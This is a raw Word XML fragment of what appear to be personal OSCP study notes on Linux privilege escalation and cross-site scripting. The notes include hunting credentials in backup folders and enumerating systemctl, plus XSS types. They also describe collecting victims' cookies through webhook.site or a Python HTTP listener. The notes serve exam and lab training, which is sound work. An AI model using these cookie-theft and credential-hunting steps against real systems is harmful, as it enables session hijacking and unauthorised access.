      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These two examples provide an entry point for the many avenues available when hunting for leaked credentials. Having covered the low-hanging fruit, next we'll explore how to escalate privileges via misconfigured file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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3F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_116zzstzltry" w:id="382"/>
      <w:bookmarkEnd w:id="382"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl &amp; systemd enumeration</w:t>
      </w:r>
    </w:p>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl --version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to check to see if systemctl might have some vulnerabilities. This was the case for the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sau HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> retired Machine</w:t>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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The actual daemon and backend system manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A utility to interact with and manage systemd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cb7ulme80ico" w:id="383"/>
      <w:bookmarkEnd w:id="383"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backups</w:t>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t xml:space="preserve">It's a very good privilege escalation strategy to look at backups, since they often have readable versions of previous credentials, or important files.</w:t>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t xml:space="preserve">We saw this first hand in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> when there was a /opt/backup folder that held credentials </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B4E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was also mentioned in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tib3rius</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> course in the video Weak File Permissions </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B50">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp, /var/backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B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53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B56">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rpgsh6ewelrm" w:id="384"/>
      <w:bookmarkEnd w:id="384"/>
      <w:hyperlink r:id="rId926">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">XSS (Cross-Site Scripting)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B58">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More can be found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 8.4. Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="531"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It actually is really comprehensive and looks good</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId927">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">webhook.site</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to receive all the cookies that get sent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="332" name="image330.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image330.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92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2B5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IF YOU USE WEBHOOKS, MAKE SURE TO DO https, not http</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The underlined is where to find the URL to send it to. And then a new entry on the left will appear when someone sends a GET request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you should see a cookie whenever someone sends a cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can set up python server to listen to requests:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag in Python stands for module. It tells Python to locate the specified module (in this case, http.server), and run it as a script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Python HTTP server gives access to the files in the current working directory (CWD) where the command is executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B65">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t73binu7bnrl" w:id="385"/>
      <w:bookmarkEnd w:id="385"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand XSS Types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Malicious script is stored on the server (e.g., in databases, comments, or user profiles).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cross-Site Scripting) is a type of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stored XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the attacker injects malicious scripts into a web application, but the payload is not immediately executed in their own browser. Instead, it gets triggered later in a different context, typically when an administrator or another user with elevated privileges accesses the affected data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Malicious script is reflected off the server, often via URL parameters or form inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you send that URL to people and they open it and since there is a script in the URL, and the page displays the content in the URL, then the page will run that malicious script upon opening the page </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="614"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The vulnerability exists entirely on the client side due to JavaScript mishandling.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP Book:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Websites use cookies to track</w:t>
      </w:r>
      <w:hyperlink r:id="rId929">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId930">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">state</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and information about users. Cookies can be set with several optional flags, including two that are particularly interesting to us as penetration testers: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
